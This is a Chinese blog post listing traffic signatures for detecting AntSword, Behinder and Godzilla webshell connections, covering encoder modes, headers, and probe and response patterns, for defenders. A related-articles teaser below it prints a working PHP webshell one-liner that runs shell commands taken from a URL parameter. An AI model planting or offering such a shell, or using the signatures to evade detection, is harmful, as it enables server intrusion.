开门见山,不说废话

判断条件

是否符合通信的特征

请求加密的数据和响应包加密的类型一致

是否一直向同一个url路径发送大量符合特征的请求,并且具有同样加密的响应包

一 、蚁剑

特征为带有以下的特殊字段
第一个:@ini_set("display_errors","0");

第二个:eval
在编码器和解码器都是default的状态下,是最容易看出来的一种情况
可以看到在下图中,请求包和返回包都是明文。也就是说一眼就能看出来是蚁剑的流量
实际上在antword中只要编码器为default,那么请求包均为明文。

antword的编码器共有以下几种模式:default、base64、chr、chr16、rot12
在连接php的webshell时,不论编码器处于那种模式,都会出现eval字段

加密为base64:

加密为chr:

加密为chr16:

加密为rot13:

二、冰蝎

总结特征:

Accept: application/json, text/javascript, */*; q=0.01   #q=0.01

最新版本请求包没有content-type,老版本Content-Type: application/octet-stream

返回字符串和请求字符串都是加密,在拥有密钥的情况下可以使用工具解密流量(当然加密也是一种特征)

加密为default_image的时候,具有png的请求头,但是请求包中可能会出现java字样的字符

如果是json加密就是

{

"id":"1",

"body":"{

"user":"加密的payload"

}"

}

加密为default_aes

header

Accept: application/json, text/javascript, */*; q=0.01

请求相应包都是AES加密

加密为default_image

加密为default_json

json结构

{

"id":"1",

"body":"{

"user":"payload"

}"

}

加密为aes_imagic

三、哥斯拉

探活数据包:

	aes_base64: 请求包POST传参pass,响应包为空

	java_raw: 请求包POST传参raw数据,Content-Type: application/octet-stream,探活数据包为空

cookie的最后面有个 ;

加密为JAVA_AES_BASE64

  • 第一个通信包使用post请求发送pass参数探活,响应包为空

  • 响应包前后有各拆分为一半的大写32位MD5值

加密为JAVA_RAW

  • 探活数据包,响应包为空,请求content-type为Content-Type: application/octet-stream

经典webshell流量特征的更多相关文章

  1. CobaltStrike去除流量特征

    CobaltStrike去除流量特征 ​普通CS没有做流量混淆会被防火墙拦住流量,所以偶尔会看到CS上线了机器但是进行任何操作都没有反应.这里尝试一下做流量混淆.参考网上的文章,大部分是两种方法,一种 ...

  2. 几种好用的经典webshell(php)

    php经典一句话: <?php echo shell_exec($_GET['cmd']);?> 中国菜刀:官网:www.maicaidao.co原理:上传一句话(<?php @ev ...

  3. DNS通道检测 国内学术界研究情况——研究方法:基于特征或者流量,使用机器学习决策树分类算法居多

    http://xuewen.cnki.net/DownloadArticle.aspx?filename=BMKJ201104017&dbtype=CJFD<浅析基于DNS协议的隐蔽通道 ...

  4. 记一次解密wireshark抓取的冰蝎通信流量

    一.关于冰蝎 1.1 简单介绍 冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端.老牌 Webshell 管理神器——中国菜刀的攻击流量特征明显,容易被各类安全设备检测,实际场 ...

  5. 冰蝎&哥斯拉 流量特征分析

    1.冰蝎(Behinder) 下载链接:https://github.com/rebeyond/Behinder/releases 截止至我发贴时,冰蝎最新版本是3.0,客户端兼容性有所提升(但仍不是 ...

  6. Assassin暗杀者-自用短小精悍的webshell管理工具分享

    Assassin Assassin是一款精简的基于命令行的webshell管理工具,它有着多种payload发送方式和编码方式,以及精简的payload代码,使得它成为隐蔽的暗杀者,难以被很好的防御. ...

  7. POJ2396 Budget(有源汇流量有上下界网络的可行流)

    题目大概给一个有n×m个单元的矩阵,各单元是一个非负整数,已知其每行每列所有单元的和,还有几个约束条件描述一些单元是大于小于还是等于某个数,问矩阵可以是怎样的. 经典的流量有上下界网络流问题. 把行. ...

  8. 监控 DNS 流量,预防安全隐患五大招!

    尽管 IT 管理员尽心尽责地监控设备.主机和网络是否存在恶意活动的迹象,却往往出力不讨好.主机入侵检测和端点保护对很多公司来说可能是"必需"的安全措施,但如果要找出 RAT.roo ...

  9. DDoS攻击流量检测方法

    检测分类 1)误用检测 误用检测主要是根据已知的攻击特征直接检测入侵行为.首先对异常信息源建模分析提取特征向量,根据特征设计针对性的特征检测算法,若新数据样本检测出相应的特征值,则发布预警或进行反应. ...

  10. EasyPR源码剖析(6):车牌判断之LBP特征

    一.LBP特征 LBP指局部二值模式,英文全称:Local Binary Pattern,是一种用来描述图像局部特征的算子,LBP特征具有灰度不变性和旋转不变性等显著优点. 原始的LBP算子定义在像素 ...

随机推荐

  1. docker - [09] 镜像详解

    题记部分 一.镜像是什么   镜像是一种轻量级.可执行的独立软件包,用来打包软件运行环境和基于运行环境开发的软件,还包含运行某个软件所需的所有内容,包括代码.运行时.库.环境变量和配置文件. 如果得到 ...

  2. 基于Microsoft.Extensions.VectorData实现语义搜索

    大家好,我是Edison. 上周水了一篇 Microsoft.Extensions.AI 的介绍文章,很多读者反馈想要了解更多.很多时候,除了集成LLM实现聊天对话,还会有很多语义搜索和RAG的使用场 ...

  3. 玩转摄像头之MT9V034(最新打样,展示下,欢迎观摩,哈哈)低照度 红外透视应用

    分辨率:752*480  低照度 效果超好先上图 图像处理.物联网.fpga.stm32研究 我的店铺:ccjt.taobao.com 

  4. 记录一段mysql代码

    SELECT f . * , tmp.userid, tmp.cishu FROM fx_user f, ( SELECT a.id, b.userid AS userid, COUNT( * ) A ...

  5. mySql跳过行数获取多少行

    LIMIT :需要获取多少条记录 OFFSET :跳过前面的多少行记录从后面开始获取 SELECT * FROM USER LIMIT 32 OFFSET 1 只获取12行记录 跳过第一条记录 SEL ...

  6. 原生开发,使用C语言调用Windows API 开发软件思路分享

    Githu: https://github.com/vladelaina/Catime 作者是一个高度依赖计时器功能的人,但是市面上的软件都不能满足个性化的需求,所以打算自己动手开发,同时采用c语言来 ...

  7. 2024数证杯决赛团体赛wp

    2024数证杯决赛团体赛wp 容器密码:mW7@B!tRp*Xz46Y9#KFUV^J2&NqoHqTpLCE%8rvGW(AX#1k@YL3$M5!bWY*9HLFq7UZR6^T!XoVm ...

  8. Anaconda使用记录

    1 安装 windows下,安装完添加环境变量(哦安装时勾选添加环境变量选项就是加这些变量的) ## (记anaconda软件目录为%ANACONDA3%) %ANACONDA3%\ %ANACOND ...

  9. 【P7&Loongson】支持部分中断/异常处理

    概况 常规单发射5级流水线cpu.新增支持指令{mtc0, mfc0, eret, syscall, break, bgezal, bltzal}:新增异常处理{Int, AdEL, AdES, Ov ...

  10. [Qt基础内容-04] QCheckBox

    QCheckBox 文章目录 QCheckBox 简介 信号 样式设计 本文主要根据QT官方帮助文档以及日常使用,简单的介绍一下QCheckBox的功能以及使用 简介 QCheckBox是一个按钮,其 ...